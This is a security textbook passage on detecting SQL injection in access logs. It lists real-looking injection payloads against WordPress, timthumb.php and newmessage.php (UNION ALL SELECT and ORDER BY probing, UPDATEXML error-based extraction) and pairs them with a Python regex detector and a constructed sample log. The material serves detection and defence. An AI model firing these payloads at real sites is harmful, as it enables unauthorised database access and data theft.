4.2.2 Common SQL Injection Attack Payloads

Commonly observed SQL injection attack payloads (as they appear in the request line of web access logs) are listed below:

/wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-content%2Fuploads%2F2017%2F03%2F12.png&w=-9611%22%20UNION%20ALL%20SELECT%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303--%20&h=210&zc=1
/newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x3a6e676f3a%2C%28SELECT%20%28CASE%20WHEN%20%283114%3D3114%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7262793a%29%2C6430%29%20%20AND%20%22Enli%22%3D%22Enli
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23
/wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-content%2Fuploads%2F2017%2F03%2F12.png&w=-2372%22%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985--%20&h=210&zc=1
/wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23
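The payloads above share a handful of recognisable techniques once the URL encoding is removed: UNION ALL SELECT column-count probing, ORDER BY probing, UPDATEXML error-based extraction, an AND "x"="x tautology, and a trailing comment (-- or #) to discard the rest of the application's query. The following detector is an added example written for this section, not code from the book; it URL-decodes the request path of each access-log line (repeatedly, so double-encoded variants are not missed) and reports which techniques match. The log lines are constructed for illustration around the payloads listed above; the rule names, the regular expressions and the function names are this example's own.

```python
"""Flag SQL injection payloads in web-server access logs.

Added example (not from the book). The request paths are the payloads listed
in this section; the surrounding log-line fields are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Each rule names one injection technique, matched against the DECODED path.
SQLI_RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "updatexml_error_based": re.compile(r"\bupdatexml\s*\(", re.I),
    # AND "Enli"="Enli  (the closing quote comes from the application's own SQL)
    "boolean_tautology": re.compile(r"\band\s+(['\"])(\w+)\1\s*=\s*\1\2", re.I),
    # "-- " or a trailing "#" that comments out the remainder of the query
    "comment_terminator": re.compile(r"--\s|#\s*$"),
}

# Request field of the Apache/nginx combined log format: "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_url(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so that
    double-encoded payloads such as %2527 are seen as the quote they hide."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_path(path: str) -> list[str]:
    """Return the names of every injection technique found in a request path."""
    decoded = decode_url(path)
    return [name for name, rx in SQLI_RULES.items() if rx.search(decoded)]


def scan_log(lines) -> list[dict]:
    """Return one alert per log line whose request matches at least one rule."""
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we can parse; skip rather than guess
        hits = classify_path(match.group("path"))
        if hits:
            alerts.append({"path": match.group("path"), "techniques": hits})
    return alerts


# Constructed access-log lines; the paths are the section's payloads plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2017:10:01:02 +0800] "GET /wp-login.php?action=lostpassword%25%27%20ORDER%20BY%201%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Mar/2017:10:01:03 +0800] "GET /wp-content/themes/begin/timthumb.php?src=http%3A%2F%2Fwww.lawqt.com%2Fwp-content%2Fuploads%2F2017%2F03%2F12.png&w=-9611%22%20UNION%20ALL%20SELECT%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303%2C%208303--%20&h=210&zc=1 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [12/Mar/2017:10:01:04 +0800] "GET /newmessage.php?tosys=1&title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x3a6e676f3a%2C%28SELECT%20%28CASE%20WHEN%20%283114%3D3114%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7262793a%29%2C6430%29%20%20AND%20%22Enli%22%3D%22Enli HTTP/1.1" 500 233',
    '203.0.113.5 - - [12/Mar/2017:10:01:05 +0800] "GET /wp-login.php?action=lostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2017:10:02:00 +0800] "GET /wp-content/uploads/2017/03/12.png HTTP/1.1" 200 40210',
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(", ".join(alert["techniques"]), "<-", decode_url(alert["path"]))
```

Decoding before matching is the essential step: none of the keywords are visible in the raw log text, and a single decode is not always enough, which is why decode_url loops. The rules are deliberately narrow (a bare SELECT is not flagged) so that ordinary parameters such as sort=order_by_price do not raise alerts; in production, pair the pattern hits with the response status and request rate from the same source address to rank them.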